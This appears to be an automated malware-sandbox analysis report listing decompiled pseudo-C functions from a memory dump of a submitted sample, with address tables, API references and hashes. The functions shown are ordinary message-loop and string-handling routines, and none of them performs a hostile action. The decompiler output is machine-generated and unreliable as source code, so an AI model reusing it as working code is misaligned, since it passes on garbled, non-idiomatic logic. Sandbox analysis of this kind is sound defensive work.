Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC

Uniqueness

Uniqueness Score: -1.00%

Function 0041F070 Relevance: 7.5, APIs: 5, Instructions: 49
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041F070() {
				struct tagMSG _v32;
				long _t7;

				PostThreadMessageW( *0x51325c, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t7 = WaitForSingleObject( *0x513260, 0xa);
				} while (_t7 == 0x102);
				 *0x513260 = 0;
				 *0x51325c = 0;
				return _t7;
			}

0x0041f085
0x0041f0a0
0x0041f0b0
0x0041f0b6
0x0041f0c6
0x0041f0d2
0x0041f0d4
0x0041f0dd
0x0041f0e7
0x0041f0f5

APIs

PostThreadMessageW.USER32 ref: 0041F085
PeekMessageW.USER32 ref: 0041F0AC
DispatchMessageW.USER32 ref: 0041F0B6
PeekMessageW.USER32 ref: 0041F0C4
WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041E500 Relevance: 7.5, APIs: 5, Instructions: 49
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E500() {
				struct tagMSG _v32;
				long _t7;

				PostThreadMessageW( *0x513258, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t7 = WaitForSingleObject( *0x513254, 0xa);
				} while (_t7 == 0x102);
				 *0x513254 = 0;
				 *0x513258 = 0;
				return _t7;
			}

0x0041e515
0x0041e530
0x0041e540
0x0041e546
0x0041e556
0x0041e562
0x0041e564
0x0041e56d
0x0041e577
0x0041e585

APIs

PostThreadMessageW.USER32 ref: 0041E515
PeekMessageW.USER32 ref: 0041E53C
DispatchMessageW.USER32 ref: 0041E546
PeekMessageW.USER32 ref: 0041E554
WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041FA40 Relevance: 7.5, APIs: 5, Instructions: 48
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FA40(long* __ecx) {
				struct tagMSG _v32;
				long _t9;
				struct HWND__** _t14;

				_t14 = __ecx;
				PostThreadMessageW( *__ecx, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t9 = WaitForSingleObject(_t14[1], 0xa);
				} while (_t9 == 0x102);
				_t14[1] = 0;
				 *_t14 = 0;
				return _t9;
			}

0x0041fa4b
0x0041fa53
0x0041fa65
0x0041fa75
0x0041fa7b
0x0041fa8b
0x0041fa94
0x0041fa9a
0x0041faa3
0x0041faaa
0x0041fab4

APIs

PostThreadMessageW.USER32 ref: 0041FA53
PeekMessageW.USER32 ref: 0041FA71
DispatchMessageW.USER32 ref: 0041FA7B
PeekMessageW.USER32 ref: 0041FA89
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4

Uniqueness

Uniqueness Score: -1.00%

Function 0041FDF0 Relevance: 7.5, APIs: 5, Instructions: 48
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FDF0(long* __ecx) {
				struct tagMSG _v32;
				long _t9;
				struct HWND__** _t14;

				_t14 = __ecx;
				PostThreadMessageW( *__ecx, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t9 = WaitForSingleObject(_t14[1], 0xa);
				} while (_t9 == 0x102);
				_t14[1] = 0;
				 *_t14 = 0;
				return _t9;
			}

0x0041fdfb
0x0041fe03
0x0041fe15
0x0041fe25
0x0041fe2b
0x0041fe3b
0x0041fe44
0x0041fe4a
0x0041fe53
0x0041fe5a
0x0041fe64

APIs

PostThreadMessageW.USER32 ref: 0041FE03
PeekMessageW.USER32 ref: 0041FE21
DispatchMessageW.USER32 ref: 0041FE2B
PeekMessageW.USER32 ref: 0041FE39
WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00417BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00417BA0(signed int __ebx, signed int __ecx, signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t101;
				signed int _t104;
				signed int _t107;
				signed int _t109;
				signed int _t111;
				signed int _t113;
				signed int _t116;
				intOrPtr _t122;
				intOrPtr _t128;
				intOrPtr* _t136;
				signed int _t137;
				intOrPtr* _t139;
				signed int _t146;
				intOrPtr _t154;
				signed int _t155;
				intOrPtr _t162;
				signed int _t171;
				signed int _t174;
				signed int _t176;
				signed int _t177;
				signed int _t180;
				intOrPtr* _t186;
				signed int _t187;
				signed int _t191;
				intOrPtr _t196;
				signed int _t199;
				signed int _t200;
				intOrPtr _t204;
				signed int _t206;
				intOrPtr* _t207;
				void* _t209;
				signed int _t210;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t215;
				void* _t217;
				signed int _t218;
				signed int _t219;
				signed int _t221;
				signed int _t222;
				intOrPtr _t223;
				void* _t224;
				signed int _t233;
				signed int _t238;
				intOrPtr* _t239;
				signed int _t241;
				void* _t250;
				void* _t252;
				void* _t253;

				_t176 = __ebx;
				_push(__ecx);
				_t206 = _a12;
				_t238 = __ecx;
				_push(_t221);
				if(_t206 == 0) {
					L13:
					_t186 =  *((intOrPtr*)(_t238 + 0x10));
					_t101 = _a4;
					__eflags = _t186 - _t101;
					if(__eflags < 0) {
						_push("invalid string position");
						E0044F26C(__eflags);
						goto L46;
					} else {
						_t233 = _a8;
						_t217 = _t186 - _t101;
						__eflags = _t217 - _t233;
						_push(_t176);
						_t176 = _a16;
						_t221 =  <  ? _t217 : _t233;
						_t186 = _t186 - _t221;
						__eflags = (_t101 | 0xffffffff) - _t176 - _t186;
						if(__eflags <= 0) {
							L46:
							_push("string too long");
							E0044F23E(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_t250 = _t252;
							_t253 = _t252 - 8;
							_push(_t238);
							_push(_t221);
							_t222 = _v12;
							_t239 = _t186;
							__eflags = _t222;
							if(_t222 == 0) {
								L60:
								_t104 =  *(_t239 + 0x10);
								_t187 = _v0;
								__eflags = _t104 - _t187;
								if(__eflags < 0) {
									_push("invalid string position");
									E0044F26C(__eflags);
									goto L91;
								} else {
									_t209 = _t104 - _t187;
									_t187 = _a12;
									_push(_t176);
									_t180 = _a4;
									__eflags = _t209 - _t180;
									_t176 =  <  ? _t209 : _t180;
									_t113 = _t104 - _t176;
									_a4 = _t113;
									__eflags = (_t113 | 0xffffffff) - _t187 - _a4;
									if(__eflags <= 0) {
										L91:
										_push("string too long");
										E0044F23E(__eflags);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t250);
										_push(_t176);
										_push(_t239);
										_push(_t222);
										_t223 = _v44;
										__eflags =  *((intOrPtr*)(_t187 + 0x10)) - _t223;
										_t224 =  <  ?  *((void*)(_t187 + 0x10)) : _t223;
										__eflags =  *((intOrPtr*)(_t187 + 0x14)) - 8;
										if( *((intOrPtr*)(_t187 + 0x14)) >= 8) {
											_t187 =  *_t187;
										}
										_t177 = _a8;
										__eflags = _t224 - _t177;
										_t241 =  <  ? _t224 : _t177;
										__eflags = _t241;
										if(_t241 == 0) {
											L98:
											_t107 = 0;
											__eflags = 0;
										} else {
											_t207 = _a4;
											while(1) {
												__eflags =  *_t187 -  *_t207;
												if( *_t187 !=  *_t207) {
													break;
												}
												_t187 = _t187 + 2;
												_t207 = _t207 + 2;
												_t241 = _t241 - 1;
												__eflags = _t241;
												if(_t241 != 0) {
													continue;
												} else {
													goto L98;
												}
												goto L99;
											}
											_t111 =  *_t187 & 0x0000ffff;
											__eflags = _t111 -  *_t207;
											asm("sbb eax, eax");
											_t107 = (_t111 & 0xfffffffe) + 1;
										}
										L99:
										__eflags = _t107;
										if(_t107 != 0) {
											L104:
											return _t107;
										} else {
											__eflags = _t224 - _t177;
											if(_t224 >= _t177) {
												__eflags = _t224 - _t177;
												_t100 = _t224 != _t177;
												__eflags = _t100;
												_t107 = 0 | _t100;
												goto L104;
											} else {
												_t109 = _t107 | 0xffffffff;
												__eflags = _t109;
												return _t109;
											}
										}
									} else {
										_t210 = _t209 - _t176;
										_v16 = _t210;
										__eflags = _t187 - _t176;
										if(_t187 < _t176) {
											_t128 =  *((intOrPtr*)(_t239 + 0x14));
											__eflags = _t128 - 8;
											if(_t128 < 8) {
												_a4 = _t239;
											} else {
												_a4 =  *_t239;
												_t222 = _a8;
											}
											__eflags = _t128 - 8;
											if(_t128 < 8) {
												_v12 = _t239;
											} else {
												_v12 =  *_t239;
											}
											__eflags = _t210;
											if(_t210 != 0) {
												E004205A0(_v12 + (_v0 + _t187) * 2, _a4 + (_v0 + _t176) * 2, _t210 + _t210);
												_t222 = _a8;
												_t253 = _t253 + 0xc;
												_t187 = _a12;
											}
										}
										__eflags = _t187;
										if(_t187 != 0) {
											L73:
											_a4 = _t187 - _t176 +  *(_t239 + 0x10);
											_t116 = E00415D50(_t176, _t239, _t222, _t239, _t187 - _t176 +  *(_t239 + 0x10), 0);
											__eflags = _t116;
											if(_t116 != 0) {
												_t191 = _a12;
												__eflags = _t176 - _t191;
												if(_t176 >= _t191) {
													_t182 = _v0;
												} else {
													_t122 =  *((intOrPtr*)(_t239 + 0x14));
													__eflags = _t122 - 8;
													if(_t122 < 8) {
														_t212 = _t239;
													} else {
														_t212 =  *_t239;
													}
													__eflags = _t122 - 8;
													if(_t122 < 8) {
														_a8 = _t239;
													} else {
														_a8 =  *_t239;
													}
													_t182 = _v0;
													E0040B600(_a8 + (_v0 + _t191) * 2, _t212 + (_v0 + _t176) * 2, _v16);
													_t191 = _a12;
													_t253 = _t253 + 4;
												}
												__eflags =  *((intOrPtr*)(_t239 + 0x14)) - 8;
												if( *((intOrPtr*)(_t239 + 0x14)) < 8) {
													_t211 = _t239;
												} else {
													_t211 =  *_t239;
												}
												__eflags = _t191;
												if(_t191 != 0) {
													E0042D8D0(_t211 + _t182 * 2, _t222, _t191 + _t191);
												}
												E00414DF0(_t239, _a4);
											}
										} else {
											__eflags = _t176;
											if(_t176 != 0) {
												goto L73;
											}
										}
										return _t239;
									}
								}
							} else {
								_t196 =  *((intOrPtr*)(_t239 + 0x14));
								__eflags = _t196 - 8;
								if(_t196 < 8) {
									_t136 = _t239;
								} else {
									_t136 =  *_t239;
								}
								__eflags = _t222 - _t136;
								if(_t222 < _t136) {
									goto L60;
								} else {
									__eflags = _t196 - 8;
									if(_t196 < 8) {
										_t215 = _t239;
									} else {
										_t215 =  *_t239;
									}
									_t137 =  *(_t239 + 0x10);
									__eflags = _t215 + _t137 * 2 - _t222;
									if(_t215 + _t137 * 2 <= _t222) {
										goto L60;
									} else {
										__eflags = _t196 - 8;
										if(_t196 < 8) {
											_t139 = _t239;
										} else {
											_t139 =  *_t239;
										}
										__eflags = _t222 - _t139;
										return E00414920(_t176, _t239, _t222 - _t139 >> 1, _t239, _v0, _a4, _t239, _t222 - _t139 >> 1, _a12);
									}
								}
							}
						} else {
							_t218 = _t217 - _t221;
							_v8 = _t218;
							__eflags = _t176 - _t221;
							if(_t176 < _t221) {
								_t162 =  *((intOrPtr*)(_t238 + 0x14));
								__eflags = _t162 - 0x10;
								if(_t162 < 0x10) {
									_a8 = _t238;
								} else {
									_a8 =  *_t238;
								}
								__eflags = _t162 - 0x10;
								if(_t162 < 0x10) {
									_a16 = _t238;
								} else {
									_a16 =  *_t238;
								}
								__eflags = _t218;
								if(_t218 != 0) {
									__eflags = _a16 + _a4 + _t176;
									E004205A0(_a16 + _a4 + _t176, _a8 + _a4 + _t221, _t218);
									_t252 = _t252 + 0xc;
								}
							}
							__eflags = _t176;
							if(_t176 != 0) {
								L26:
								_push(0);
								_a16 = _t176 - _t221 +  *((intOrPtr*)(_t238 + 0x10));
								_t146 = E00415810(_t176, _t238, _t221, _t176 - _t221 +  *((intOrPtr*)(_t238 + 0x10)));
								__eflags = _t146;
								if(_t146 == 0) {
									goto L44;
								} else {
									__eflags = _t221 - _t176;
									if(_t221 < _t176) {
										_t154 =  *((intOrPtr*)(_t238 + 0x14));
										__eflags = _t154 - 0x10;
										if(_t154 < 0x10) {
											_a8 = _t238;
										} else {
											_a8 =  *_t238;
										}
										__eflags = _t154 - 0x10;
										if(_t154 < 0x10) {
											_t219 = _t238;
										} else {
											_t219 =  *_t238;
										}
										_t155 = _v8;
										__eflags = _t155;
										if(_t155 != 0) {
											__eflags = _t219 + _a4 + _t176;
											E004205A0(_t219 + _a4 + _t176, _a8 + _a4 + _t221, _t155);
											_t252 = _t252 + 0xc;
										}
									}
									__eflags =  *((intOrPtr*)(_t238 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
										_t199 = _t238;
									} else {
										_t199 =  *_t238;
									}
									__eflags = _t176;
									if(_t176 != 0) {
										__eflags = _a4 + _t199;
										E0042D8D0(_a4 + _t199, _a12, _t176);
									}
									__eflags =  *((intOrPtr*)(_t238 + 0x14)) - 0x10;
									_t200 = _a16;
									 *((intOrPtr*)(_t238 + 0x10)) = _t200;
									if( *((intOrPtr*)(_t238 + 0x14)) < 0x10) {
										 *((char*)(_t238 + _t200)) = 0;
										goto L44;
									} else {
										 *((char*)( *_t238 + _t200)) = 0;
										return _t238;
									}
								}
							} else {
								__eflags = _t221;
								if(_t221 == 0) {
									L44:
									return _t238;
								} else {
									goto L26;
								}
							}
						}
					}
				} else {
					_t204 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t204 < 0x10) {
						_t171 = __ecx;
					} else {
						_t171 =  *((intOrPtr*)(__ecx));
					}
					if(_t206 < _t171) {
						goto L13;
					} else {
						if(_t204 < 0x10) {
							_t221 = _t238;
						} else {
							_t221 =  *_t238;
						}
						if( *((intOrPtr*)(_t238 + 0x10)) + _t221 <= _t206) {
							goto L13;
						} else {
							if(_t204 < 0x10) {
								_t174 = _t238;
							} else {
								_t174 =  *_t238;
							}
							return E00418000(_t176, _t238, _t221, _t238, _a4, _a8, _t238, _t206 - _t174, _a16);
						}
					}
				}
			}

0x00417ba0
0x00417ba3
0x00417ba4
0x00417ba8
0x00417baa
0x00417bad
0x00417bfc
0x00417bfc
0x00417bff
0x00417c02
0x00417c04
0x00417d2c
0x00417d31
0x00000000
0x00417c0a
0x00417c0a
0x00417c0f
0x00417c11
0x00417c13
0x00417c14
0x00417c17
0x00417c1d
0x00417c21
0x00417c23
0x00417d36
0x00417d36
0x00417d3b
0x00417d40
0x00417d41
0x00417d42
0x00417d43
0x00417d44
0x00417d45
0x00417d46
0x00417d47
0x00417d48
0x00417d49
0x00417d4a
0x00417d4b
0x00417d4c
0x00417d4d
0x00417d4e
0x00417d4f
0x00417d51
0x00417d53
0x00417d56
0x00417d57
0x00417d58
0x00417d5b
0x00417d5d
0x00417d5f
0x00417db1
0x00417db1
0x00417db4
0x00417db7
0x00417db9
0x00417edf
0x00417ee4
0x00000000
0x00417dbf
0x00417dc1
0x00417dc3
0x00417dc6
0x00417dc7
0x00417dca
0x00417dcc
0x00417dcf
0x00417dd1
0x00417dd9
0x00417ddc
0x00417ee9
0x00417ee9
0x00417eee
0x00417ef3
0x00417ef4
0x00417ef5
0x00417ef6
0x00417ef7
0x00417ef8
0x00417ef9
0x00417efa
0x00417efb
0x00417efc
0x00417efd
0x00417efe
0x00417eff
0x00417f00
0x00417f03
0x00417f04
0x00417f05
0x00417f06
0x00417f09
0x00417f0c
0x00417f10
0x00417f14
0x00417f16
0x00417f16
0x00417f18
0x00417f1b
0x00417f1f
0x00417f22
0x00417f24
0x00417f41
0x00417f41
0x00417f41
0x00417f26
0x00417f26
0x00417f30
0x00417f33
0x00417f36
0x00000000
0x00000000
0x00417f38
0x00417f3b
0x00417f3e
0x00417f3e
0x00417f3f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00417f3f
0x00417f55
0x00417f58
0x00417f5b
0x00417f60
0x00417f60
0x00417f43
0x00417f43
0x00417f45
0x00417f6a
0x00417f6e
0x00417f47
0x00417f47
0x00417f49
0x00417f65
0x00417f67
0x00417f67
0x00417f67
0x00000000
0x00417f4b
0x00417f4d
0x00417f4d
0x00417f52
0x00417f52
0x00417f49
0x00417de2
0x00417de2
0x00417de4
0x00417de7
0x00417de9
0x00417deb
0x00417dee
0x00417df1
0x00417dfd
0x00417df3
0x00417df5
0x00417df8
0x00417df8
0x00417e00
0x00417e03
0x00417e0c
0x00417e05
0x00417e07
0x00417e07
0x00417e0f
0x00417e11
0x00417e2e
0x00417e33
0x00417e36
0x00417e39
0x00417e39
0x00417e11
0x00417e3c
0x00417e3e
0x00417e48
0x00417e4f
0x00417e55
0x00417e5a
0x00417e5c
0x00417e5e
0x00417e61
0x00417e63
0x00417ea6
0x00417e65
0x00417e65
0x00417e68
0x00417e6b
0x00417e71
0x00417e6d
0x00417e6d
0x00417e6d
0x00417e73
0x00417e76
0x00417e7f
0x00417e78
0x00417e7a
0x00417e7a
0x00417e8a
0x00417e99
0x00417e9e
0x00417ea1
0x00417ea1
0x00417ea9
0x00417ead
0x00417eb3
0x00417eaf
0x00417eaf
0x00417eaf
0x00417eb5
0x00417eb7
0x00417ec2
0x00417ec7
0x00417ecf
0x00417ecf
0x00417e40
0x00417e40
0x00417e42
0x00000000
0x00000000
0x00417e42
0x00417edc
0x00417edc
0x00417ddc
0x00417d61
0x00417d61
0x00417d64
0x00417d67
0x00417d6d
0x00417d69
0x00417d69
0x00417d69
0x00417d6f
0x00417d71
0x00000000
0x00417d73
0x00417d73
0x00417d76
0x00417d7c
0x00417d78
0x00417d78
0x00417d78
0x00417d7e
0x00417d84
0x00417d86
0x00000000
0x00417d88
0x00417d88
0x00417d8b
0x00417d91
0x00417d8d
0x00417d8d
0x00417d8d
0x00417d96
0x00417dae
0x00417dae
0x00417d86
0x00417d71
0x00417c29
0x00417c29
0x00417c2b
0x00417c2e
0x00417c30
0x00417c32
0x00417c35
0x00417c38
0x00417c41
0x00417c3a
0x00417c3c
0x00417c3c
0x00417c44
0x00417c47
0x00417c50
0x00417c49
0x00417c4b
0x00417c4b
0x00417c53
0x00417c55
0x00417c67
0x00417c6a
0x00417c6f
0x00417c6f
0x00417c55
0x00417c72
0x00417c74
0x00417c7e
0x00417c87
0x00417c8a
0x00417c8d
0x00417c92
0x00417c94
0x00000000
0x00417c9a
0x00417c9a
0x00417c9c
0x00417c9e
0x00417ca1
0x00417ca4
0x00417cad
0x00417ca6
0x00417ca8
0x00417ca8
0x00417cb0
0x00417cb3
0x00417cb9
0x00417cb5
0x00417cb5
0x00417cb5
0x00417cbb
0x00417cbe
0x00417cc0
0x00417cd1
0x00417cd4
0x00417cd9
0x00417cd9
0x00417cc0
0x00417cdc
0x00417ce0
0x00417ce6
0x00417ce2
0x00417ce2
0x00417ce2
0x00417ce8
0x00417cea
0x00417cf3
0x00417cf6
0x00417cfb
0x00417cfe
0x00417d02
0x00417d05
0x00417d08
0x00417d1d
0x00000000
0x00417d0a
0x00417d0e
0x00417d18
0x00417d18
0x00417d08
0x00417c76
0x00417c76
0x00417c78
0x00417d21
0x00417d29
0x00000000
0x00000000
0x00000000
0x00417c78
0x00417c74
0x00417c23
0x00417baf
0x00417baf
0x00417bb5
0x00417bbb
0x00417bb7
0x00417bb7
0x00417bb7
0x00417bbf
0x00000000
0x00417bc1
0x00417bc4
0x00417bca
0x00417bc6
0x00417bc6
0x00417bc6
0x00417bd3
0x00000000
0x00417bd5
0x00417bd8
0x00417bde
0x00417bda
0x00417bda
0x00417bda
0x00417bf9
0x00417bf9
0x00417bd3
0x00417bbf

APIs

_memmove.LIBCMT ref: 00417C6A
_memmove.LIBCMT ref: 00417CD4

Strings

string too long, xrefs: 00417D36
invalid string position, xrefs: 00417D2C

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9

Uniqueness

Uniqueness Score: -1.00%

Function 00414160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00414160(signed int __eax, void* __ebx, intOrPtr* __ecx, signed int __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr* _v20;
				void* __ebp;
				intOrPtr* _t24;
				intOrPtr _t31;
				intOrPtr* _t34;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t48;
				intOrPtr* _t51;
				intOrPtr _t53;
				intOrPtr* _t56;
				intOrPtr* _t57;
				signed int _t59;
				void* _t60;
				intOrPtr* _t63;
				void* _t67;

				_push(__ecx);
				_push(__ebx);
				_t63 = __ecx;
				_push(__edi);
				_t59 = __edi | 0xffffffff;
				_t51 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t51 < _a4) {
					L32:
					_push("invalid string position");
					E0044F26C(__eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					__eflags =  *((intOrPtr*)(_t51 + 0x14)) - 0x10;
					_t24 = _v20;
					if( *((intOrPtr*)(_t51 + 0x14)) >= 0x10) {
						_t51 =  *_t51;
					}
					 *_t24 = _t51;
					return _t24;
				} else {
					_t48 = _a8;
					_t5 = _t48 + 0x10; // 0xcccccccc
					_t60 =  <  ?  *_t5 : _t59;
					if((__eax | 0xffffffff) - _t51 <= _t60) {
						_push("string too long");
						E0044F23E(__eflags);
						goto L32;
					} else {
						if(_t60 != 0) {
							_push(0);
							_v8 = _t51 + _t60;
							if(E00415810(_t48, __ecx, _t60, _t51 + _t60) != 0) {
								_t31 =  *((intOrPtr*)(__ecx + 0x14));
								if(_t31 < 0x10) {
									_a8 = __ecx;
								} else {
									_a8 =  *__ecx;
								}
								if(_t31 < 0x10) {
									_t56 = _t63;
								} else {
									_t56 =  *_t63;
								}
								_t53 = _a4;
								_t33 =  *((intOrPtr*)(_t63 + 0x10)) != _t53;
								if( *((intOrPtr*)(_t63 + 0x10)) != _t53) {
									E004205A0(_t56 + _t53 + _t60, _a8 + _t53, _t33);
									_t53 = _a4;
									_t67 = _t67 + 0xc;
								}
								if(_t63 != _t48) {
									__eflags =  *((intOrPtr*)(_t48 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t48 + 0x14)) >= 0x10) {
										_t48 =  *_t48;
									}
									__eflags =  *((intOrPtr*)(_t63 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t63 + 0x14)) < 0x10) {
										_t34 = _t63;
									} else {
										_t34 =  *_t63;
									}
									__eflags = _t60;
									if(_t60 != 0) {
										__eflags = _t34 + _t53;
										E0042D8D0(_t34 + _t53, _t48, _t60);
										goto L28;
									}
								} else {
									_t38 =  *((intOrPtr*)(_t63 + 0x14));
									if(_t38 < 0x10) {
										_t57 = _t63;
									} else {
										_t57 =  *_t63;
									}
									if(_t38 < 0x10) {
										_t39 = _t63;
									} else {
										_t39 =  *_t63;
									}
									if(_t60 != 0) {
										E004205A0(_t39 + _t53, _t57, _t60);
										L28:
									}
								}
								E00414460(_t63, _v8);
							}
						}
						return _t63;
					}
				}
			}

0x00414163
0x00414164
0x00414166
0x00414168
0x00414169
0x0041416c
0x00414172
0x00414260
0x00414260
0x00414265
0x0041426a
0x0041426b
0x0041426c
0x0041426d
0x0041426e
0x0041426f
0x00414273
0x00414277
0x0041427a
0x0041427c
0x0041427c
0x0041427e
0x00414281
0x00414178
0x00414178
0x0041417f
0x0041417f
0x0041418a
0x00414256
0x0041425b
0x00000000
0x00414190
0x00414192
0x0041419d
0x004141a0
0x004141aa
0x004141b0
0x004141b6
0x004141bf
0x004141b8
0x004141ba
0x004141ba
0x004141c5
0x004141cb
0x004141c7
0x004141c7
0x004141c7
0x004141d0
0x004141d3
0x004141d5
0x004141e4
0x004141e9
0x004141ec
0x004141ec
0x004141f1
0x0041421c
0x00414220
0x00414222
0x00414222
0x00414224
0x00414228
0x0041422e
0x0041422a
0x0041422a
0x0041422a
0x00414230
0x00414232
0x00414235
0x00414239
0x00000000
0x00414239
0x004141f3
0x004141f3
0x004141f9
0x004141ff
0x004141fb
0x004141fb
